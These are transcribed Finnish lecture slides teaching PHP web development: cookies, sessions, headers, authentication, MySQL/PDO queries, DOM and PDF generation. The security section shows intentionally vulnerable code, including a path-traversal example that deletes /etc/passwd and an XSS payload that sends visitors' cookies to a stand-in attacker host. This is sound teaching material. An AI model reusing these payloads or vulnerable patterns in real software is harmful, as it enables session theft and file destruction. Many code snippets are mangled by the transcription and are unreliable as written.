PHP-perusteet. Jouni Ikonen - Jouni.Ikonen lut.fi

Koko: px
Aloita esitys sivulta:

Download "PHP-perusteet. Jouni Ikonen - Jouni.Ikonen lut.fi"

Transkriptio

1 CT30A WWW-sovellukset PHP-perusteet Jouni Ikonen - Jouni.Ikonen lut.fi Kalvot Arto Hämäläisen kalvojen pohjalta 1 Jouni Ikonen

2 Sisältö PHP Evästeiden käyttö HTTP-otsikkotietojen käsittely ja lähetys Istuntotietojen käsittely Käyttäjien tunnistaminen Tietoturvasta Jouni Ikonen 2

3 Evästeet (cookies) HTTP on tilaton protokolla, ja sen perustoiminnallisuudella ei voida yhdistää peräkkäisiä sivulatauksia toisiinsa Evästeen (Cookie) avulla palvelin voi lähettää selaimelle tiedon, jonka avulla se voidaan tunnistaa myöhemmillä latauskerroilla Selain lähettää palvelimen lähettämän evästeen muuttamattomana takaisin palvelimelle mikäli evästeiden käyttö on estetty selaimen asetuksissa, niitä ei luonnollisesti voi käyttää evästeelle voidaan asettaa voimassaoloaika, ja lisäksi voidaan määritellä, poistetaanko se selainohjelmaa suljettaessa käyttäjä voi poistaa evästeen selainohjelmasta, ja palvelinpäästä voidaan myös pyytää poistamaan eväste esim. asettamalla sen päättymisaika menneisyyteen Jouni Ikonen 3

4 Evästeet (Cookies) Evästeet lähetetään HTTP-otsikoissa ennen varsinaista dokumenttia Evästeiden lähetys voidaan tehdä PHP:n avulla, kutsumalla evästeen lähettämisfunktiota heti dokumentin alussa, ennen sivun varsinaista sisältöä funktion paluuarvo kertoo, onnistuiko tiedot lähettää vai oliko sivun sisältöä jo lähetetty (ei kerro, hyväksyikö käyttäjä evästeen) <?php /* Cookie asetettava ennen tiedoston sisällön tulostamista */ $value = "Cookien sisältö"; $paluuarvo = setcookie("testicookie", $value, time()+3600);?> <!DOCTYPE html Jouni Ikonen 4

5 Evästeet (Cookies), PHP PHP:ssä evästeiden asetukseen ja lähettämiseen selaimelle on 2 funktiota: setcookie( string nimi [, string arvo [, int voimassaoloaika [, string polku [, string toimialue [, bool suojattu[, bool $httponly ] ]]]]] ) setrawcookie() on vastaava ilman sisällön URLkoodausta nimi kuvaus esimerkki nimi evästeen nimi (pakollinen) käytetään cookie-taulukossa avaimena arvo selaimelle tallennettava tieto luettaessa: $_COOKIE['nimi'] voimassaoloaika miten kauan voimassa time()+60*60*24 (vuorokausi) polku missä luettavissa /athamala/ luettavissa vain palvelimen hakemistossa /athamala/ toimialue suojattu käytettävän toimialueen (domainin) nimi tarvitaanko suojattu HTTPSyhteys evästeen siirtoon 0 tai 1 (false tai true) Jouni Ikonen 5

6 Evästeet (Cookies), PHP Selaimelta lähetetyt, aikaisemmilla selauskerroilla tallennetut evästeet ovat automaattisesti käytössä $_COOKIE[] -taulukossa Mikäli evästettä ei ole asetettu ja lähetetty aikaisemmin selaimelle, tai se on vanhentunut, $_COOKIE[]-taulukon kyseinen kenttä on tyhjä jos ei muita evästeitä ole, $_COOKIE[] on tyhjä if (isset($_cookie['testicookie'])) { echo "<p>eväste löytyi, tulostetaan sen sisältö: \"".$_COOKIE['TestiCookie']."\"</p>"; } else { echo "<p>evästettä ei asetettu</p>"; } Jouni Ikonen 6

7 Evästeet (Cookies), PHP Evästeiden poisto tapahtuu myös setcookie()- funktiolla, nimi ja muut käytetyt argumentit yksilöivät evästeen toinen kenttä (cookien sisältö) asetetaan tyhjäksi ("") tai epätodeksi (FALSE) totuusarvon (FALSE) avulla tapahtuvan poiston takia varsinaisena evästeen arvona ei tulisi käyttää totuusarvoa vaihtoehtoinen tapa on asettaa 3. argumentti (voimassaoloaika) menneisyyteen, esim. time() Jouni Ikonen 7

8 Evästeet (Cookies), PHP evästeen asetus: <?php /* Cookie asetettava ennen tiedoston sisältöä */ $value = "Selaimen yksilöivä ja tunnistava merkkijono"; $paluuarvo = setcookie("testicookie", $value, time()+3600);?> evästeen käyttö: if (isset($_cookie['testicookie']) ) { echo "<p>cookie löytyi, tulostetaan sen sisältö: \"".$_COOKIE['TestiCookie']."\" </p>"; } Jouni Ikonen 8

9 HTTP-otsikkotietojen lähetys PHP:llä PHP:n avulla voidaan lisätä ja lähettää palvelimen ja selainohjelman välissä käytettävän HTTP-siirtoprotokollan otsikkokenttiä Otsikkotiedot lisätään header(string string [, bool replace [, int http_response_code]] )-funktiolla oletusarvoisesti korvataan edellinen samanniminen kenttä, mutta voidaan myös lisätä replace-argumentin arvoksi false, mikä lisää toisen samannimisen otsikon, http_response_code määrittelee HTTP-vastauksen tila-arvon headers_sent() -funktiolla voidaan tarkistaa, onko otsikot jo lähetetty selaimelle, vai voidaanko vielä lähettää lisää otsikoita palauttaa TRUE, jos otsikot jo lähetetty, ja FALSE, jos otsikoita voidaan vielä lisätä ja vaihtaa Otsikkokenttien avulla voidaan mm. määrittää dokumentin muoto ohjata uudelle sivulle ilmoittaa virhe sivua ladatessa pyytää käyttäjäntunnistusta jne Jouni Ikonen 9

10 HTTP-otsikkotiedot, uudelleenohjaus PHP:n avulla voidaan selaimen pyyntö ohjata uudelle sivulle Tapahtuu header("location: osoite") -funktiolla HTTP/1.1 -protokollamääritys vaatii absoluuttisen osoitteen ohjausarvona suhteellisen sijaan, mutta selaimet ymmärtävät kyllä suhteellisen Varmempaa siis kuitenkin käyttää absoluuttista osoitetta, joka voidaan muodostaa dynaamisesti esim. <?php $palvelin = $_SERVER['HTTP_HOST']; $hakemisto = rtrim(dirname($_server["php_self"]), '/\\'); $sivu = 'header2.php'; if (!headers_sent()) { header("location: exit; } else { echo "virhe, otsikot jo lähetetty"; }?> Jouni Ikonen 10

11 HTTP-otsikkotiedot, dokumenttityypin määrittely esim. lataapdf.php?file=tiedosto <?php /* asetetaan otsikkokentillä tyypiksi pdf ja määritellään tiedosto ladattavaksi liitetiedostoksi, poistetaan mahdolliset hakemistot tiedostonimestä, ettei pääse lukemaan ihan mitä tahansa tiedostoa */ if (!empty($_get['file'])) { $luettavatiedosto = basename($_get['file']); $luettavatiedosto.= ".pdf"; header('content-type: application/pdf'); header('content-disposition: attachment; filename='.$luettavatiedosto); readfile($luettavatiedosto); } else { echo "<form method=\"get\">tiedoston nimi (esim. \"luentox\"): <input type=\"text\" name=\"file\" /></form>"; }?> Jouni Ikonen 11

12 HTTP-otsikkotiedot, virhekäsittelijä Mikäli halutaan määritellä palvelin palauttamaan virhetapauksessa (esim. tiedostoa ei löydy) erilainen virhesivu, voidaan se tehdä määrittelemällä virheenkäsittelijäksi php-sivu, jossa lähetetään otsikkotietona virhetieto ja sen jälkeen näytetään haluttu virheilmoitus virhe.php: <?php if (!headers_sent()) { header("http/ Not Found"); }?> <!DOCTYPE Jouni Ikonen 12

13 Istuntotietojen käsittely Istuntotietojen avulla voidaan tallentaa tietoa käsiteltäväksi myöhemmissä php-sivuissa, joita samalla kerralla haetaan Sivuilla vierailevalle annetaan yksilöllinen tunniste, joka tallennetaan evästeeksi tai välitetään otsikkotiedoissa mukana Mikäli php-esikäsittelijän asetuksissa (ei siis php-koodissa) on määritelty istunnon automaattinen aloitus (session.auto_start = 1), tai skriptissä kutsutaan funktiota session_start(), mahdollistetaan muuttujien tallennus istuntotietoihin tieto istunnosta luodaan, kun ensimmäinen muuttuja rekisteröidään istuntotietoihin (seuraava kalvo) huom. mikäli automaattinen aloitus on käytössä, ei voida olioita tallentaa istuntotietoihin, koska luokkamääritykset tulee ladata ennen istunnon aloitusta olion uudelleenluomisen takia Jouni Ikonen 13

14 Istuntotietojen käsittely Tietoja mahdollista tallentaa istunnon ajaksi $_SESSION[]-taulukkoon (suositeltava) tai session_register() -funktiolla (vanhentunut) session_unregister(), session_is_registered() -funktioilla poistetaan tai tarkistetaan muuttuja istuntotiedoista $_SESSION[]-taulukon kenttiä voidaan käsitellä samalla tavoin kuin muitakin muuttujia esim. unset($_session['laskuri']); isset($_session['laskuri']); session_destroy(); Jouni Ikonen 14

15 Istuntotietojen käsittely <?php session_start(); <html> // The session_start() function must appear BEFORE the if(isset($_session['views'])) $_SESSION['views']=$_SESSION['views']+1; else $_SESSION['views']=1; // if $SESSION['views'] does not exist create it echo "Views=". $_SESSION['views'];?> More: Jouni Ikonen 15

16 Istuntotietojen välitys Istuntotietojen tunniste voidaan välittää eri kutsujen välillä evästeiden avulla (voimassaolo siihen asti, kunnes selain suljetaan), oletusevästeenä $_COOKIE['PHPSESSID'] URL-osoitteen parametrina Istuntotiedoista välitetään selaimelle vain istuntotunniste, muut istuntokohtaiset tiedot $_SESSION -taulukossa pidetään vain palvelimella Evästeiden käyttöä suositellaan istuntotunnisteen välitykseen, mutta PHP tarjoaa vaihtoehtoiseksi myös URL-osoitteeseen koodauksen URL-osoitteessa näkyminen vaatii use_trans_sid -asetusarvon päälle laittamista php-esikäsittelijän asetuksista (nykyisissä versioissa poissa käytöstä oletuksena) voi aiheuttaa ongelmia, mikäli istuntotietoja tallennetaan kirjanmerkkeihin tai julkisten tietokoneiden välimuisteihin Jouni Ikonen 16

17 HTTP-käyttäjäntunnistus PHP:llä Mikäli PHP:tä ajetaan Apache-palvelimen moduulina, voidaan PHP:ssä käyttää HTTP-käyttäjäntunnistuslaatikkoa Käyttäjäntunnistus voi olla Basic- (käyttäjän tunnus ja salasana lähetetään selaimelta palvelimelle) tai Digest-tyyppiä (salasanalla muodostetaan vastaus satunnaiseen haasteeseen, eikä sitä lähetetä verkon yli) Käyttäjän syöttämät tiedot tallentuvat muuttujiin $_SERVER['PHP_AUTH_USER'] sisältää käyttäjätunnuksen $_SERVER['PHP_AUTH_PW'] sisältää salasanan (ei Digestvaihtoehdossa) $_SERVER['PHP_AUTH_DIGEST'] sisältää Digestautentikoinnissa saadun vastauksen Näitä muuttujia voidaan sitten vertailla sallittuihin tunnuksiin ja niiden salasanoihin Jouni Ikonen 17

18 HTTP-käyttäjätunnistus PHP:llä <?php if (!isset($_server['php_auth_user'])) { header('www-authenticate: Basic realm="testisivu"'); header('http/ Unauthorized'); /* lähetetään 401-tilaviesti, joka tarkoittaa käyttäjäntunnistuksen vaatimista */ echo 'Et ole tunnistautunut'; exit; } else { // tässä tilanteessa pitää tarkistaa, että alla olevilla tunnuksilla on oikeutta jotain tehdä! echo "<p>olet siis \"{$_SERVER['PHP_AUTH_USER']}\", ja "; echo "salasanasi on \"{$_SERVER['PHP_AUTH_PW']}\"</p>"; }?> More: Jouni Ikonen 18

19 Tietoturva Riippuen palvelimen asetuksista, PHP:llä voidaan ajaa hyvinkin vapaasti erilaisia toimintoja pääsy palvelimen tiedostoihin yhteydet palvelimelta muihin koneisiin järjestelmäkomentojen ajo palvelimella Sen takia tuleekin tietoturvaa miettiä PHP-sivuja luodessa erittäin tarkkaan Tietoturva muodostuu sekä palvelimen oikeanlaisesta konfiguroinnista että PHP-skriptien tietoturvasta Jouni Ikonen 19

20 Tietoturva Kaksi tärkeää perusasiaa: Palvelimen konfiguroinnissa PHP-moduulille annetavaan vain tarpeelliset oikeudet Tarkista skriptissä kaikki syötteet, jotka tulevat käyttäjältä tai muualta varmistamattomasta lähteestä WWW-palvelimen hakemistossa olevalla tiedostolla on URL-osoite, jonka avulla voidaan kutsua suoraan (vaikkei tarkoitus olekaan, vaan esim. php:n include():lla), mikäli ei ole palvelimesta estetty (tarkkana nimeämisten ja liitettävien tiedostojen hakemiston valinnan kanssa) Tarkistamattomien syötteiden ja väärien oikeuksien avulla voi saada pahaa jälkeä tiedostojärjestelmässä ja tietokantayhteyksissä Käydään tietokantakyselyiden tietoturvasta tarkemmin ensi kerralla, kun käsitellään tietokantojen käyttöä PHP:llä yleensäkin Jouni Ikonen 20

21 Tietoturva, lomakkeen käsittely PHP-skriptissä ei voi olettaa, että lomakkeen tietoja käsitellessä asiakaspuolen tarkistukset olisivat tarpeeksi kattavat javascript-tarkistukset voi ohittaa kytkemällä javascriptin pois selaimen asetuksista lomakkeeseen määritellyt arvot voi ilkeämielinen ohittaa tekemällä uuden lomakkeen tai vaikka kutsumalla skriptiä muulla tavoin, esim. telnet-yhteyden kautta tai omalla ohjelmalla <form action="/process.php" method="post"> <select name="color"> <option value="red">red</option> <option value="green">green</option> <option value="blue">blue</option> </select> <input type="submit" /> </form> <form action="http://example.org/process.php" method="post"> <input type="text" name="color" /> <input type="submit" /> </form> Jouni Ikonen 21

22 Tietoturva, syötteen käsittely <?php /* käyttäjän määrittelemien tiedostojen lukeminen onnistuu kätevästi samasta hakemistosta, mutta onko turvallista? */ $tiedosto = $_GET['tiedosto']; $hakemisto = './' // nykyinen hakemisto $hakemistotiedosto = $hakemisto.$tiedosto; $jep = readfile($hakemistotiedosto);?> Jouni Ikonen 22

23 Tietoturva <?php // remove a file from the user's home directory $username = $_POST['user_submitted_name']; $homedir = "/home/$username"; $file_to_delete = "$userfile"; unlink ("$homedir/$userfile"); echo "$file_to_delete has been deleted!";?> <?php // removes a file from anywhere on the hard drive that // the PHP user has access to. If PHP has root access: $username = "../etc/"; $homedir = "/home/../etc/"; $file_to_delete = "passwd"; unlink ("/home/../etc/passwd"); echo "/home/../etc/passwd has been deleted!";?> Jouni Ikonen 23

24 Tietoturva <?php // removes a file from the hard drive that // the PHP user has access to. $username = $_SERVER['REMOTE_USER']; // tunnistettu käyttäjä // käyttäjän kotihakemiston muodostus $homedir = "/home/$username"; $file_to_delete = basename("$userfile"); // poistaa polut unlink ($homedir/$file_to_delete); $fp = fopen("/home/logging/filedelete.log","+a"); // kirjoittaa lokiin poiston tiedot $logstring = "$username $homedir $file_to_delete"; fwrite ($fp, $logstring); fclose($fp); echo "$file_to_delete has been deleted!";?> Jouni Ikonen 24

25 Tietoturva, "cross-site scripting" XSS Cross-site scripting -termillä (XSS) tarkoitetaan hyökkäyksiä, joiden avulla käyttäjän luottamalla sivulla näytetäänkin toisen sivun sisältöä vähän edelliseen liittyvä, koska usein näytettävä data on määritelty lomakkeen syötteen avulla erityinen uhka käyttäjien luottamilla sivuilla, joilla paljon käyttäjien syöttämän tekstin näyttämistä, esim. keskustelupalstat XSS-uhkia voidaan välttää varmistamalla ulkoisesta lähteestä tulevan datan oikeellisuus käyttämällä PHP:n sisäänrakennettuja funktioita muokkaamaan syötteistä oikeellisia muotoja, esim. htmlentities() tekee html:n käyttämistä merkeistä html - erityismerkittyjä, esim. "< >" "< >" strip_tags() poistaa html- ja php-tagit merkkijonosta utf8_decode() koodaa utf8-merkistöön koodatun ISO merkistön mukaisen tekstin ISO merkistöön suhtautumalla kriittisesti kaikkeen dataan, kunnes ne on varmasti korjattu Jouni Ikonen 25

26 XSS, esimerkki PHP-skripti (esim. vieraskirja) <form> <input type="text" name="message"> <br /> <input type="submit"> </form> <?php if (isset($_get['message'])) { $fp = fopen('./messages.txt', 'a'); fwrite($fp, "{$_GET['message']}<br />"); fclose($fp); } readfile('./messages.txt');?> Mitä jos käyttäjä syöttääkin viestiksi <script> document.location = 'http://paha.osoite.fi/sivu.php? cookies=' + document.cookie </script>? OK, hyvin konfiguroiduilla nykyisellä versiolla ei välttämättä mitään, koska syötteessä käsitellään jo tietyt merkit automaattisesti, mutta antaa aihetta www-sovelluskehittäjänkin miettiä tiettyjä tietoturva-asioita Jouni Ikonen 26

27 Tietoturva, Include-sivujen käyttö tietokantaskripti.php <?php /* pistetään asetukset sopivasti tiedostoon, josta ne luetaan mukavasti eri skripteistä */ include('db.inc') db.inc: <?php $mysql_host = "localhost"; $mysql_user = "jee"; $mysql_pass = "joo"; // tehdään tietokannalle jotain?> Mikäli sisällytettävä tiedosto db.inc on nimetty esimerkin kaltaisesti ja pistetty WWWpalvelimen sivuhakemistoon, eikä palvelimella ei ole.inc -tiedostoja pistetty käsittelyyn PHP-esikäsittelijän kautta, sisällytettävän tiedoston nimen arvaamalla voidaan selvittää arkaluontoisia asioita, esim. käyttäjätunnuksia - toisaalta myös näiden sivujen suora PHPkäsittely voi myöskin aiheuttaa ongelmia, mikäli kehittäjä ei ole huomioinut asiaa?> Jouni Ikonen 27

28 CT30A WWW-sovellukset Tietokantojen käyttö WWWsovelluksissa Jouni.Ikonen lut.fi Kalvot Arto Hämäläisen kalvojen pohjalta 1 Jouni Ikonen

29 Tietokannan käyttö PHP:ssä PHP sisältää sisäänrakennetun tuen useille eri tietokannoille ja tietokantayhteyksille MySQL, Oracle, PostgreSQL, SQLite, ODBC,... Käsitellään esimerkkinä MySQL-tietokannan käyttöä lähes poikkeuksetta vastaavat funktiot löytyvät myös muille mainituille tietokannoille, ja lisäksi... PHP:n versiossa 5 on esitelty PHP Data Objects -malli, jolla pyritään luomaan yhtenäinen liityntä eri tietokantoihin tietokantayhteyden määrittelevät funktion argumentit riippuvat käytettävästä tietokannasta, muuten toiminnot ovat yhtäläiset eri tietokantojen välillä Arto Hämäläinen & Jouni Ikonen 2

30 Tietokantayhteyden vaiheet Tietokantaa käyttävä PHP-skripti suorittaa yleensä seuraavat toiminnot: yhteyden luominen tietokantaan (osoite, käyttäjätunnus, salasana) käytettävän tietokannan valinta ja kyselyn suorittaminen kyselyn palauttaman tiedon haku tulosresurssista taulukkoon tai olioon ja tietojen käsittely skriptissä vain kyselyissä, joissa haetaan tietoa yhteyden katkaisu Arto Hämäläinen & Jouni Ikonen 3

31 PHP, Tietokantayhteyden luominen Tietokantayhteys luodaan PHP-skriptistä joko mysql_connect() tai mysql_pconnect() -funktioilla, jotka palauttavat onnistuessaan yhteyden tunnisteen tai epäonnistuessaan arvon epätosi (false) mysql_pconnect() luo pysyvän yhteyden, joka ei katkea skriptin suorituksen jälkeen, uudet tämän funktion kutsut palauttavat aikaisemmin luodun yhteyden tunnisteen yhteydenmuodostuksen tyypin vaihto ei vaikuta skriptin toimintaan, tehokkuuteen voi kylläkin vaikuttaa $yhteys = mysql_connect('localhost', 'kayttaja', 'salasana'); if (!$yhteys) { } die( "Tietokantayhteys epäonnistui: ". mysql_error()) ; echo "Tietokantayhteys onnistui"; // suoritetaan halutut komennot // voidaan sulkea lopuksi haluttaessa komennolla mysql_close(); Arto Hämäläinen & Jouni Ikonen 4

32 PHP, tietokannan valinta ja kyselyn suoritus Käytettävä tietokanta valitaan funktiolla mysql_select_db('tietokannan_nimi') Tietokantakysely suoritetaan funktiolla $tulos = mysql_query('kysely') onnistunut kysely palauttaa tulosresurssin tai totuusarvon tosi (riippuen kyselyn tyypistä), epäonnistunut totuusarvon false (epätosi) /* valitaan tietokanta */ mysql_select_db('oma_tietokanta') or die ('Tietokannan valinta epäonnistui'); /* määritellään kysely ja suoritetaan se */ $kysely = 'select * from henkilo'; $tulos = mysql_query($kysely) or die ('Kysely epäonnistui: '. mysql_error()); Arto Hämäläinen & Jouni Ikonen 5

33 PHP, tulosresurssin käsittely Onnistuneen kyselyn jälkeen tietokantakyselyn tulosresurssi (mikäli kyseessä oli tiedon haku) voidaan käydä läpi rivi riviltä siirtäen tietokannan tiedot PHP:n sisältämiin tietotyyppeihin Kunkin rivin tiedot voidaan tallentaa taulukkomuotoon suorittamalla silmukassa $taulukko = mysql_fetch_array($tulos) -funktio funktiolle voidaan määritellä toisena argumenttina taulukon avainten haluttu muoto: MYSQL_ASSOC (tietokannan sarakkeen nimi), MYSQL_NUM (numero), MYSQL_BOTH (molemmat, oletus) Vaihtoehtoisia funktioita kyselyresurssin läpikäymiseen ovat mysql_fetch_row() (samanlainen kuin mysql_fetch_array MYSQL_NUM -määrityksellä ja mysql_fetch_object() (palauttaa olion) Arto Hämäläinen & Jouni Ikonen 6

34 PHP, tulosresurssin käsittely mysql_fetch_... -funktiot palauttavat kerrallaan yhden rivin ja siirtävät sisäistä osoitinta rivin verran eteenpäin Mikäli tietoja ei enää ole saatavilla, funktiot palauttavat totuusarvon epätosi Niiden käyttö tulee siis sisällyttää esim. while-silmukkaan tyhjän haun sattuessa while-silmukan sisältöä ei suoriteta yhtään kertaa Haluttaessa palautettujen rivien määrä saadaan funktiolla mysql_num_rows($tulos), ja muokkauskyselyssä muokattujen rivien määrä funktiolla mysql_affected_rows($yhteys) /* käydään läpi tulosresurssia */ while ($taulukko = mysql_fetch_array($tulos, MYSQL_BOTH)) { } echo "Sarake 1:". $taulukko[0]; // tai $taulukko['sarake1'] Arto Hämäläinen & Jouni Ikonen 7

35 Tietokannan käyttö PHP:ssä, yhteenveto $host = "localhost"; //tietokannan osoite $database = "oma_tietokanta"; //tietokannan nimi $user = "username"; //käyttäjänimi $password = "salasana"; //salasana mysql_connect($host, $user, $password); mysql_select_db($database) or die ("Database selection failed"); $query = "select * from taulu"; $tulos = mysql_query($query); /* tehdään jotain kyselyn tulokselle */ mysql_close(); // suljetaan yhteys Arto Hämäläinen & Jouni Ikonen 8

36 PHP, tietoturva tietokannan käytössä Merkittävin uhka tietoturvalle PHP-käytössä on tarkistamattomat kyselyt, joissa käytetään käyttäjän antamaa syötettä Tarkistamaton kysely saattaa mahdollistaa tietokannan tietojen lukemisen, muuttamisen, poiston tai oikeuksien muutoksen Turvalliseen käyttöön on useita ohjeita käytä tunnusta, jolla on vain välttämättömimmät oikeudet tietokantaan tarkista, onko annettu tieto oikeaa tyyppiä, ja tarvittaessa muunna tieto haluttuun muotoon, esim. settype($offset, 'integer'); $query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset"; käytä erikoismerkkien asianmukaiseen käsittelyyn tarkoitettuja funktioita kyselyä valmistellessa, esim. MySQL:n kanssa mysql_real_escape_string() älä tulosta skriptissä tietokantaan liittyviä tietoja, ettei sitä paljastu tärkeitä tietoja tietokannasta Arto Hämäläinen & Jouni Ikonen 9

37 PHP Data Objects, PDO PHP Data Objects (PDO) -laajennus sisältää yhtenäisen liitynnän eri tietokantoihin PHP:stä saatavissa alkaen PHP:n versiosta 5 käytettävän tietokannan vaihto onnistuu PDOluokan muodostinfunktion argumentteja vaihtamalla varsinaiset käyttöfunktiot ovat samat kaikille tietokannoille Tuki eri tietokannoille on PDO:n mukaisissa tietokannan ajureissa PDO-ajurit olemassa yleisimmille tietokannoille (MySQL, Oracle, PostgreSQL, SQLite, ODBC, jne.) Arto Hämäläinen & Jouni Ikonen 10

38 PDO, Yhteyden luonti Tietokantayhteys luodaan luomalla PDO-luokan olio $yhteys = new PDO(...) luokkana tietokantatyypistä riippumatta PDO Luokan muodostinfunktiolle annetaan argumenttina tietokannasta riippuva yhteyden määrittelevä merkkijono ja mahdollisesti käyttäjänimi ja salasana esim. MySQL: $yhteys = new PDO('mysql:host=localhost;dbname=oma_tietokanta', $kayttaja, $salasana); esim. SQLite2: $yhteys = new PDO('sqlite2:.\tietokanta.db'); Yhteys puretaan asettamalla olion muuttujan arvoksi null, esim. $yhteys = null; Arto Hämäläinen & Jouni Ikonen 11

39 PDO, Kyselyn vaiheet Kysely valmistellaan tietokantayhteyden olion prepare()-funktiolla $kysely = $yhteys->prepare('select * FROM henkilo'); Kysely suoritetaan execute()-funktiolla $kysely->execute(); funktion palautusarvosta voidaan tarkistaa sen onnistuminen Kyselyn tuloksia voidaan käsitellä olion fetch() -jäsenfunktion avulla Arto Hämäläinen & Jouni Ikonen 12

40 PDO, muuttujien sitominen valmisteltuihin kyselyihin PDO:n avulla voidaan muodostaa dynaamisia kyselyitä sitomalla muuttujia valmisteltuihin kyselyhin bindparam() -funktiolla muuttujat voidaan sitoa nimettyihin kohtiin kyselyssä, $kysely->bindparam(':nimi', $nimi) indeksein, joihin viitataan kyselyssä?-merkillä $kysely->bindparam(1, $nimi); $kysely->prepare('select * from henkilo where etunimi = :nimi ') $kysely->bindparam(':nimi', $etunimi); // TAI $kysely->prepare('select * from henkilo where etunimi =? ') $kysely->bindparam(1, $etunimi); Arto Hämäläinen & Jouni Ikonen 13

41 PDO, muuttujien sitominen valmisteltuihin kyselyihin Suoritettaessa kyselyä execute()-funktiolla sijoitetaan muuttujien arvot kyselyihin sidotuille paikoilleen Muuttujan arvoa muuttamalla ja kutsumalla execute()-funktiota uudestaan saadaan aikaisemmin valmisteltu kysely suoritettua uudestaan uudella muuttujan arvolla Esim. taulukon tiedot voidaan lisätä tietokantaan foreachsilmukassa sijoittamalla sidottuihin muuttujiin taulukon kenttien arvot ja kutsumalla PDO:n execute-funktiota silmukan ajokerroilla Arto Hämäläinen & Jouni Ikonen 14

42 Yksinkertainen PDO-esimerkki // yhteydenmuodostus riippuu käytettävästä tietokannasta $yhteys = new PDO('mysql:host=localhost;dbname=test', $kayttaja, $salasana); // kyselyn määritys ja valmistelu, haetaan kaikkien Brianeiden tiedot $etunimi = 'Brian'; $kysely = $yhteys->prepare('select * FROM henkilo WHERE etunimi =?'); $kysely->bindparam(1, $etunimi); // kyselyn suoritus ja tuloksen käsittely if ($tila = $kysely->execute()) { } while ($rivi = $kysely->fetch()) { print_r($rivi); } $etunimi = 'Matti'; $kysely->execute(); //... Mattien tietojen haku $yhteys = null; // yhteyden sulkeminen Arto Hämäläinen & Jouni Ikonen 15

43 Yksinkertainen PDO-esimerkki, lisäys $yhteys = new PDO('mysql:host=localhost;dbname=test', $kayttaja, $salasana); // kyselyn määritys ja valmistelu $kysely = $yhteys->prepare('insert INTO henkilo (etunimi, sukunimi, puhelinnro) VALUES (:etunimi, :sukunimi, :puhelinnro)'); $kysely->bindparam( :etunimi, $etunimi); $kysely->bindparam( :sukunimi, $sukunimi); $kysely->bindparam( :puhelinnro, $puhelinnro); $etunimi = "Brian"; $sukunimi = "Kottarainen"; $puhelinnro = ' '; $kysely->execute(); // Brianin tiedot $etunimi = "Matti"; $sukunimi = "Meikäläinen"; $puhelinnro = ' '; $kysely->execute(); // Matin tiedot $yhteys = null; // yhteyden sulkeminen Arto Hämäläinen & Jouni Ikonen 16

44 PHP DOM-funktiot PHP:n avulla on mahdollista käsitellä dokumentteja Document Object Model -mallin (DOM) mukaisesti PHP:n DOM-funktiot on tarkoitettu erityisesti XML-tiedostojen käsittelyyn, mutta XHTML-tiedostojen käsittelykin onnistuu hyvin DOM-luokan olio voidaan luoda tyhjästä tai lukea olemassa oleva tiedosto Tiedosto voi olla paikallinen tai etätiedosto Arto Hämäläinen & Jouni Ikonen 17

45 PHP DOM-funktiot DOM-luokan olio voidaan luoda tyhjästä tai lukea olemassa oleva tiedosto Tiedosto voi olla paikallinen tai etätiedosto $dom = new DomDocument(); $dom->loadhtmlfile( "http://esimerkki.fi/exercises.html" ); Esim. vaihdetaan sivun tyylikirjaston osoite, halutaan käyttää testi.css - tyylitiedostoa: $linkit = $dom->getelementsbytagname('link'); for ($i = 0; $i < $linkit->length; $i++) { if ($linkit->item($i)->getattribute('rel') == 'stylesheet'){ $linkit->item($i)->setattribute('href', 'testi.css'); } } Arto Hämäläinen & Jouni Ikonen 18

46 PHP DOM-funktiot Poistetaan kaikki <p></p> -elementit (kappaleet tiedostosta $runko = $dom->getelementsbytagname('body')->item(0); $kappaleet = $dom->getelementsbytagname('p'); $maara = $kappaleet->length; for($i=0;$i<$maara;$i++) } Lisätään uusi elementti $element = $dom->createelement("h2", "Uusi kakkostason otsikko"); $dom->appendchild($element); Tulostetaan dokumentti näytölle echo $dom->savehtml(); Arto Hämäläinen & Jouni Ikonen 19

47 PHP, PDF-funktiot PHP:n avulla voidaan luoda ja käsitellä PDF-tiedostoja yleisimmin käytetty PDFLib -kirjastoa (www.pdflib.com), myös vapaita kirjastoja olemassa PDF-tiedostojen luontiin PHP:llä (esim. FPDF ) PHP5:ssä voidaan käyttää PHP5:n oliomallin mukaista ohjelmointirajapintaa, PHP4:ssä erillisiä funktioita esim. dokumentin luonti FPDF-kirjastoa käyttäen käyttäen: /* PHP 5 */ require('fpdf.php'); /* ladataan fpdf-toiminnot fpdf:sta, joka on asennettu */ $pdf=new FPDF(); /* oletuksena Pysty A4 -koko ja millimetrit yksiköinä, sama kuin $pdf=new FPDF('P','mm','A4'); */ /* tämän jälkeen $pdf-oliota käyttäen voidaan pdf-dokumenttiin lisätä tietoa */ Arto Hämäläinen & Jouni Ikonen 20

48 PHP, FPDF-funktiot Funktioiden avulla voidaan käsitellä PDF:n näkyvää sisältöä ja sen yleisiä tietoja (tekijä yms.) <?php require('fpdf.php'); $pdf=new FPDF(); $pdf->setauthor("arto Hämäläinen"); $pdf->addpage(); $pdf->image('kuva.jpg', 0, 0, 150); $pdf->setfont('arial','b',16); $pdf->setxy(5,40); $pdf->cell($pdf->getstringwidth('esimerkkiteksti')+5,10,'esimerkkiteksti',1); $pdf->output();?> Arto Hämäläinen & Jouni Ikonen 21

OPPITUNTI 19 Tilan tallentaminen evästeiden ja kyselymerkkijonojen avulla

OPPITUNTI 19 Tilan tallentaminen evästeiden ja kyselymerkkijonojen avulla 19. Tilan tallentaminen evästeiden ja kyselymerkkijonojen avulla 337 OPPITUNTI 19 Tilan tallentaminen evästeiden ja kyselymerkkijonojen avulla HTTP on tilaton protokolla. Se merkitsee sitä, että jokainen

Lisätiedot

T-76.115 Tekninen spesifikaatio

T-76.115 Tekninen spesifikaatio T-76.115 Tekninen spesifikaatio OtaShop2 Versio Päivämäärä Tekijä Kuvaus Tarkastettu 3.2 5.4.2004 Karanko Laajennettu selvitystä ylläpitopuolen tekniikasta 3.1 5.4.2004 Ojanen Pieni lisäys replikoinnin

Lisätiedot

TEKNISET OHJEET JA VARMUUSKOPIOINTI

TEKNISET OHJEET JA VARMUUSKOPIOINTI TEKNISET OHJEET JA VARMUUSKOPIOINTI Sisällys YHDEN KONEEN VERSION ASENNUS... 4 PERUSVAIHEET... 4 OHJELMAN REKISTERÖINTI YRITYKSELLE... 4 VERKKOVERSION ASENTAMINEN... 6 YLEISTÄ... 6 PALVELIMEN NIMEN ASETTAMINEN...

Lisätiedot

T106.1208 Ohjelmoinnin perusteet Y (Python) Opetusmoniste kevät 2010

